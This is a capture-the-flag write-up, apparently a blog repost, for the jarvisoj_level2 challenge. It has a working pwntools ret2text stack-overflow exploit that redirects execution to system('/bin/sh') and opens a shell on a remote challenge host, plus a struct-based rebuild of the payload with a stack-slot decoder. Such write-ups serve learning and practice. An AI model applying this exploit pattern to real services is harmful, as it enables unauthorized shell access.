pwn | jarvisoj_level2
jarvisoj_level2
A simple stack overflow: ROP, ret2text.
The binary contains system and a "/bin/sh" string.
Here is the exploit:
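from pwn import *

context.log_level = 'debug'

# sh = process('./level2')  # local testing
sh = remote('node4.buuoj.cn', 29799)

p_binsh = 0x804a024   # address of the "/bin/sh" string
# p_system = 0x804849e
p_system = 0x8048320  # address of system

sh.recv()
# Layout: 0x88 bytes to fill the buffer, 4 bytes over saved EBP, then
# the return address (system), system's own return address (a dummy value),
# and system's first argument (pointer to the "/bin/sh" string)
payload = 0x88 * b'm' + 4 * b'z' + p32(p_system) + b'Mz11' + p32(p_binsh)
sh.sendline(payload)
sh.interactive()
sh.close()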
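The stack layout that the "retaddr retaddr2 argv0" comment describes, as an added example that is not part of the original post: it rebuilds the same bytes with struct and maps them onto the 32-bit cdecl stack slots they overwrite, which is also how a crash dump of this input would be read. The slot names and helper functions are hypothetical; the offsets and addresses are the ones from the exploit.

```python
import struct

# Values taken from the exploit above.
BUF_TO_EBP = 0x88        # bytes between the start of the buffer and saved EBP
P_SYSTEM = 0x8048320
P_BINSH = 0x804a024

# Slots above the buffer in a 32-bit cdecl frame, in ascending address order
# (names are hypothetical labels for this example).
SLOTS = ["saved_ebp", "return_address", "callee_return_address", "callee_arg0"]


def build_payload():
    """Rebuild the payload bytes with struct instead of pwntools p32()."""
    return (b"m" * BUF_TO_EBP + b"z" * 4 + struct.pack("<I", P_SYSTEM)
            + b"Mz11" + struct.pack("<I", P_BINSH))


def decode_frame(data, buf_to_ebp=BUF_TO_EBP):
    """Map input bytes onto the stack slots they overwrite.

    Returns {slot_name: little-endian 32-bit value} for every slot fully
    covered by the input; slots the input does not reach are omitted.
    """
    frame = {}
    for i, name in enumerate(SLOTS):
        start = buf_to_ebp + 4 * i
        word = data[start:start + 4]
        if len(word) < 4:
            break
        frame[name] = struct.unpack("<I", word)[0]
    return frame


def overwrites_return_address(data, buf_to_ebp=BUF_TO_EBP):
    """True when the input reaches at least one byte of the return address."""
    return len(data) > buf_to_ebp + 4


if __name__ == "__main__":
    for name, value in decode_frame(build_payload()).items():
        print(f"{name:22s} 0x{value:08x}")
```

The callee_return_address slot holds the filler b'Mz11', so the process crashes once system returns; any input longer than 0x8c bytes is enough to corrupt the saved return address.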
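This article is from cnblogs (博客园), author: Mz1. When reposting, please cite the original link: https://www.cnblogs.com/Mz1-rc/p/15568726.html
If you have questions, leave a comment below or email: mzi_mzi@163.com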